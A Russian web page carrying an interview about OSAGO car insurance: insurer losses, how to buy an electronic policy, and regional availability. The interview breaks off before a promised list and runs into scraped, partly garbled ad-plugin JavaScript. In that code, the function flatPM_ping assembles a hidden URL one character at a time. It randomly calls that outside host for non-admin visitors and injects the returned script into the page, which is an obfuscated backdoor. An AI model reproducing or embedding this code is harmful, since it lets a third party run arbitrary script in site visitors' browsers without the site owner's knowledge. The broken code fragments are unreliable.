Основным преимуществом для автомобилистов является то, что больше не нужно доплачивать за износ. Раньше было достаточно много нареканий на то, что денежной компенсации не хватает на ремонт, несмотря на то, что она рассчитывается в соответствии с Единой методикой оценки ущерба, которая обновляется раз в полгода. Теперь же споры о нехватке финансирования сойдут на нет: автовладелец получит полностью отремонтированный автомобиль в пределах лимита ответственности. Для страховщиков же большим плюсом является уменьшение количества судебных выплат (особенно — нестраховых: оплата услуг юристов, моральный ущерб, штрафы, пени). Мы рассчитываем, что со временем, когда приоритет натурального возмещения будет распространяться на все договоры ОСАГО, недобросовестные автоюристы будут лишены доступа к деньгам. Система ОСАГО стабилизируется, страховщики вернутся в регионы, вопросы с доступностью полисов исчезнут.

— Судите сами: по договорам ОСАГО, которые были заключены в 2016 году, если не брать во внимание РВД, убыток страховщиков составит 12,3 млрд рублей. То есть по тем договорам ОСАГО, по которым собрали 228 млрд рублей, общие выплаты составят 240,4 млрд рублей. А если учитывать РВД, то убыток по договорам 2016 года может составить 64,8 млрд рублей, тогда общая сумма выплат превысит 292 млрд рублей. Несмотря на то, что убытки растут, страховые компании продолжают оформлять полисы, работая в минус. Интересно также то, что по КАСКО, которое является добровольным видом страхования, размер средней выплаты по страховому случаю почти сравнялся с выплатой по ОСАГО. То есть по полисам, стоимость которых различается в 10 раз, мы платим одинаково. По итогам 4 квартала 2016 года средняя выплата по ОСАГО составила 76 956 рублей при средней величине премии в 6081 рубль, по каско же на тот же период размер средней выплаты определен на уровне 77 067 рублей при средней стоимости полиса в 44 843 рубля. Ремонт стоит одинаково, процесс работы страховщика, что по КАСКО, что по ОСАГО почти не отличается. Но с ОСАГО мошенникам работать гораздо интересней, так как этот полис обязателен для всех. С КАСКО, конечно же, тоже не все чисто, не в таких масштабах, как в ОСАГО.

Мы можем посмотреть на зарубежный опыт автострахования. Там картина достаточна прозрачная: часто попадаешь в ДТП, будь добр, заплати в следующий раз за полис-аналог ОСАГО не 200 долларов, а 6 тысяч! То есть убытки от деятельности мошенников заложены в тариф, а у нас этого нет. Думаю, что в обозримом будущем мы пойдем по такому же пути.

— Не очень мне понятно, как полис электронный оформлять, надо сначала у вас его просчитать? или нет? расскажите поэтапно, если можно

— Заходите на официальный сайт нужной страховой компании (список с активными ссылками можно найти на сайте РСА), заходите в личный кабинет или регистрируете его (если еще не зарегистрированы). Заполняете все поля в заявлении о заключении электронного договора ОСАГО. Если есть вопросы по заполнению, звоните вашему страховщику по телефону горячей линии, специалисты все прояснят. Если потребует система, к заявлению прикрепите электронные копии (сканы) необходимых документов: водительского удостоверения всех лиц, допущенных к управлению автомобилем; паспорта транспортного средства или свидетельства о его регистрации; диагностической карты. После внесения данной информации в базе АИС РСА проверяется ваш КБМ (коэффициент, который снижает стоимость полиса ОСАГО за безаварийную езду и повышает за ДТП в предыдущие периоды страхования). Далее вас проинформируют о финальной стоимости полиса ОСАГО. Его нужно оплатить при помощи банковской карты.

Электронный полис вы получите на электронную почту. Документ необходимо распечатать и иметь при себе при управлении транспортным средством.

Важно, чтобы полис был в базе АИС РСА. Именно в ней по серии и номеру е-полиса его подлинность проверит инспектор ГИБДД. Вы можете самостоятельно осуществить подобную проверку у нас сайте, и в случае каких-то проблем — обратиться в Российский союз автостраховщиков (РСА).

Если вдруг заключение электронного договора ОСАГО страховщиком, на сайт которого вы обратились, невозможно (например, по техническим причинам) вы будете перенаправлены на сайт другой страховой компании (это называется «замещающий страховщик») для заключения электронного договора ОСАГО. Все данные, которые вы ранее внесли в систему, сохранятся.

— В каких регионах меньше всего страховых, которые ОСАГО продают? Что-то вы собираетесь с этим делать?

— С учетом того, что у нас прекрасно работает система Единый агент РСА, нельзя сказать, что где-то страховщиков больше или меньше — это вообще относительное понятие. Есть регионы, где купить полис ОСАГО в офисе компании сложнее, чем в иных, поэтому год назад мы запустили Единого агента. Таким образом, страхователь может приобрести полис ОСАГО быстро и без проблем. Только имейте в виду, что система предлагает оформить полис в страховой компании автоматически, с учетом установленной квоты. Иными словами, к какому страховщику привязан ваш ПТС, такой полис вам и оформят. Если вас не устраивает данный подход, вы сможете оформить полис в электронном виде на сайте желаемой страховой компании.

Что касается регионов убыточных, то сегодня ТОП-20 (по совокупности ряда показателей, за 1 кв. 2017 г.) выглядит так:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}